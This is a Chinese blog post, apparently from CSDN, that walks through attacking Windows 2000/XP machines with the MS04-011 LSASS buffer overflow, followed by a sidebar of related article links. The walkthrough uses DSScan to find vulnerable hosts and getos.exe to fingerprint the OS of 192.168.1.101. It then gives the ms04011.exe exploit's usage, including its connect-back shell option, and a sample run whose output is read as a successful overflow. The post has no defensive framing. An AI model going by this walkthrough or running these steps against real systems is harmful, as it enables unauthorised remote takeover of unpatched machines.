缓冲区溢出漏洞 ms04011

最新推荐文章于 2018-04-15 12:43:58 发布
最新推荐文章于 2018-04-15 12:43:58 发布
阅读量899 收藏 1
点赞数 1
分类专栏: 工具 黑客 文章标签: 缓冲区溢出 ms04011
工具 同时被 2 个专栏收录
130 篇文章 1 订阅
订阅专栏
黑客
26 篇文章 2 订阅
订阅专栏

DSScan使用
扫描目标主机是否存在ms04011漏洞
1
getos使用
获取操作系统类型

> getos.exe 192.168.1.101

-------------------------------------------------------
 THCsmbgetOS v0.1 - gets group, server and os via SMB
       by Johnny Cyberpunk (jcyberpunk@thc.org)
-------------------------------------------------------

[*] Connecting Port 139....
[*] Sending session request....
[*] Sending negotiation request....
[*] Sending setup account request....
[*] Successful....

Remote OS:
----------
WORKGROUP
Windows 2000 LAN Manager
Windows 5.1

ms04011使用

//帮助
> ms04011.exe
Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit
            bug discoveried by eEye,
            code by sbaa(sysop@sbaa.3322.org) 2004/04/24 ver 0.
            Usage:
            ms04011.exe 0 targetip (Port ConnectBackIP )
                         ---->  attack 2k (tested on cn sp4,en
            ms04011.exe 1 targetip (Port ConnectBackIP )
                         ---->  attack xp (tested on cn sp1)

//举例
> ms04011.exe 1 192.168.1.101
shellcode size 404
Ret value = 1726    //1726代表溢出成功
thomas_blog
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ms04011工具
06-17
ms04011ms04011ms04011ms04011
centos漏洞系列(十一):LibCurl IMAP响应处理不当导致缓冲区溢出漏洞
gosenkle的专栏
11-03 2099
简介: IMAP的FETCH响应包含了指示返回数据长度的数据,当响应中显示返回数据长度为0字节时,libcurl也会为这段不存在的数据分配一个指针和一个为0的长度,并将这些内容传递给deliver-data函数,libcurl的deliver-data函数把0作为魔术数处理,对0字节的数据调用strlen()以获取长度。在堆上调用strlen()可能导致读取到未正确使用null截断的内容,导致li...
Ms04011漏洞
CARBON
07-06 5758
呵呵,大家都应知道这个漏洞吧,哈哈,它好厉害哦。HACKER们利用它来可以得到操作系统的administrators权限,得到系统的shell。不多说别的,看看他们都是入何入侵别人的机器吧。 1.  首先,去下载ms04011漏洞溢出的工具,网上有好多哦。工具中包括了DSScan, GetOS, MS04011溢出工具DSScan:这个工具是用来扫描系统是否有MS04011漏洞的工
MS04011 利用 工具包 漏洞 扫描
12-18
MS04011 利用 工具包 漏洞 扫描
易语言防止文件内存溢出
07-22
易语言防止文件内存溢出源码,防止文件内存溢出,读入子程序
东南大学网络空间安全实验基础——缓冲区溢出漏洞实验
07-07
东南大学网络空间安全实验基础——缓冲区溢出漏洞实验 该实验报告的主要目的是了解缓冲区溢出漏洞的原理和实验过程。缓冲区溢出漏洞是一种常见的安全漏洞,攻击者可以通过溢出缓冲区来 inject恶意代码,从而控制...
缓冲区溢出攻击实例
12-20
MS05-039 漏洞是 Microsoft Windows 即插即用功能中的缓冲区溢出漏洞,该漏洞可以让攻击者获得系统的控制权。MS05-039 漏洞的原理是由于 Plug and Play 服务中有未经检查的缓冲区,使得攻击者可以inject恶意代码。 ...
MS08067漏洞溢出攻击
11-21
MS08067漏洞溢出攻击
缓冲区溢出攻击与防范实验报告参考.pdf
02-08
在实验中,我们使用了MS08-067漏洞来进行缓冲区溢出攻击。MS08-067是一个对操作系统版本依赖非常高的漏洞,可以允许远程执行代码。在实验中,我们首先构建了一个网络测试环境,包括一台win10系统的计算机和一台...
缓冲区溢出教程缓冲区溢出教程
12-18
缓冲区溢出教程缓冲区溢出教程缓冲区溢出教程缓冲区溢出教程
ms04011漏洞利用工具
06-10
ms04011漏洞的利用工具包! 包含文件DSScan.exe,getos.exe,ms04011.exe,sbaanetapi.dll.
ms04011.rar_MS040_ms04011_ms04011 d_ms04011.c
09-21
微软漏洞ms04011的dos下的扫描器,多线程
GetOSVersion:通过 3 种方式获取 Windows 操作系统版本信息。 使用 API、GetVersionEx、VerifyVersionInfo
06-13
获取操作系统版本 在 Windows 上获取操作系统版本信息。 如何建造 使用 Visual Studio 2013,打开项目文件 GetOSVersion.sln。 设置配置(发布或调试) 构建解决方案。 $(SolutionDir)\Release 中有输出文件 如何使用 GetOSVersion.exe 必须只需要 1(一个)参数。 论证的意义: 1 : 使用 GetVersionEx 2:使用VerifyVersionInfo已知的OSVersion 3:使用VerifyVersionInfo UnKnown OSVersion 一些问题 克服 Windows 8.1 对 GetVersionEx 和 GetVersion API 的弃用,使用 VerifyVersionIfo API 但是,它无法克服 Windows 10 对 VerifyVersionInfo
DSScan1.0.rar
01-24
DSScan1.0.rar扫描工具
GNU Wget缓冲区溢出漏洞
岁月安然
04-15 739
简介GNU Wget是GNU计划开发的一套用于在网络上进行下载的自由软件,它支持通过HTTP、HTTPS以及FTP这三个最常见的TCP/IP协议下载。 GNU Wget 1.19.2之前的版本中存在缓冲区溢出漏洞。远程攻击者可利用该漏洞在受影响的应用程序上下文中执行任意代码或造成拒绝服务。修复需将版本升级至1.19.2版本及更高wget http://ftp.gnu.org/gnu/wget/w...
gets(s)存在的溢出漏洞问题
miaobeihai的博客
03-02 3194
scanf遇到输出不能有空格,所以用gets输入字符串,但是gets出现了一个潜在问题,gets将不停地往s中塞东西,不管s的可用空间是否足够,就存在溢出漏洞问题 解决方案可以用fgets代替, 不如说char s[100],buf[100]; fgets(buf,sizeof(s),stdin); while(fgets(buf,sizeof(buf),stdin)//循环输入
【实战】Cyrus IMAP Server IMAPMAGICPLUS预验证远程缓冲区溢出漏洞分析
FreeXploiT
03-29 1353
Cyrus IMAP Server IMAPMAGICPLUS预验证远程缓冲区溢出漏洞分析创建时间:2004-12-06文章属性:原创文章提交:san (san_at_xfocus.org)Cyrus IMAP Server IMAPMAGICPLUS预验证远程缓冲区溢出漏洞分析Stefan Esser发现了Cyrus IMAP Server的四个漏洞,其中IMAPMAGICPLUS预验证远程缓冲
“十年来攻击和防卫的弱点”——缓冲区溢出*攻击(hanlu)
jahn的专栏
10-09 436
 大凡上网久点的网人对缓冲区溢出应该是知道的,因为它的确是一个众人皆知、非常危险的漏洞,它是个不分什么系统、什么程序,都广泛存在的一个漏洞。以缓冲区溢出为类型的安全漏洞是最为常见,也是被黑客最多使用的攻击漏洞。所以了解缓冲区溢出方面的知识对于黑客也好或者管理员也好也或者是一般的网人也好都相对是有必要的。缓冲区溢出的概念和原理缓冲区是内存中存放数据的地方。在程序试图将数据放到机器内存中的某一
Microsoft SQL Server信息泄露及缓冲区溢出漏洞(MS08-040)(CVE-2008-0106)
最新发布
06-13
MS08-040是针对Microsoft SQL Server的一个安全公告,其中包括两个漏洞:信息泄露漏洞缓冲区溢出漏洞。这些漏洞可能会允许攻击者远程执行任意代码或者导致拒绝服务攻击。 信息泄漏漏洞(CVE-2008-0106)位于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值